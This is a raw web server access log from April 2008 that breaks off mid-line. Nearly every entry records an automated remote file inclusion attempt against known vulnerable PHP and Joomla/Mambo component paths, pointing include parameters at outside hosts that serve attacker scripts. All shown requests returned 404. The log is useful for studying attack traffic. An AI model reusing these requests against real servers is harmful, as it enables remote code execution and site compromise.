69.93.107.242 - - [06/Apr/2008:21:19:01 -0600] "GET //language.inc.php?langs_dir=http://owell.us/bo.do?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
69.93.107.242 - - [06/Apr/2008:21:19:01 -0600] "GET /logs//language.inc.php?langs_dir=http://owell.us/bo.do?? HTTP/1.1" 404 240 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
74.52.169.116 - - [06/Apr/2008:21:19:01 -0600] "GET /logs//admin.php?include_path=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
74.52.169.116 - - [06/Apr/2008:21:19:01 -0600] "GET //admin.php?include_path=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
70.84.7.82 - - [06/Apr/2008:21:20:47 -0600] "GET /logs/error_log.20080127/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.808"
207.58.133.62 - - [06/Apr/2008:21:22:21 -0600] "GET /logs/error_log.20080203//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.xdengue.xpg.com.br/sefe.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.808"
207.58.133.62 - - [06/Apr/2008:21:22:21 -0600] "GET /logs/access_log.20080203//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.xdengue.xpg.com.br/sefe.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.808"
70.86.152.130 - - [06/Apr/2008:21:22:55 -0600] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://shoppingspace.org/test.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
70.86.152.130 - - [06/Apr/2008:21:22:55 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://shoppingspace.org/test.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
85.114.135.126 - - [06/Apr/2008:21:24:40 -0600] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
84.18.207.65 - - [06/Apr/2008:21:26:24 -0600] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 253 "-" "libwww-perl/5.808"
84.18.207.65 - - [06/Apr/2008:21:26:25 -0600] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 248 "-" "libwww-perl/5.808"
80.93.56.80 - - [06/Apr/2008:21:26:27 -0600] "GET /logs/access_log.20080127//components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
80.93.56.80 - - [06/Apr/2008:21:26:28 -0600] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
80.93.56.80 - - [06/Apr/2008:21:26:28 -0600] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
72.232.64.122 - - [06/Apr/2008:21:26:28 -0600] "GET /logs/error_log//includes/functions_weblog.php?=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
72.232.64.122 - - [06/Apr/2008:21:26:28 -0600] "GET //includes/functions_weblog.php?=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
72.232.64.122 - - [06/Apr/2008:21:26:28 -0600] "GET /logs//includes/functions_weblog.php?=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
72.232.64.122 - - [06/Apr/2008:21:26:45 -0600] "GET /logs/access_log//includes/functions_weblog.php?=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
72.232.64.122 - - [06/Apr/2008:21:26:57 -0600] "GET //includes/functions_weblog.php?=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
80.93.56.80 - - [06/Apr/2008:21:27:11 -0600] "GET /logs/access_log.20080203//components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
69.72.221.90 - - [06/Apr/2008:21:27:22 -0600] "GET /logs/error_log.20080127/com_magazine/magazine.html.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.808"
69.72.221.90 - - [06/Apr/2008:21:27:22 -0600] "GET /com_magazine/magazine.html.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.808"
69.72.221.90 - - [06/Apr/2008:21:27:22 -0600] "GET /logs/com_magazine/magazine.html.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
70.86.152.130 - - [06/Apr/2008:21:28:48 -0600] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://shoppingspace.org/test.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
70.86.152.130 - - [06/Apr/2008:21:28:48 -0600] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://shoppingspace.org/test.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
70.86.152.130 - - [06/Apr/2008:21:29:29 -0600] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://shoppingspace.org/test.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
70.86.152.130 - - [06/Apr/2008:21:29:30 -0600] "GET /logs//components/com_galler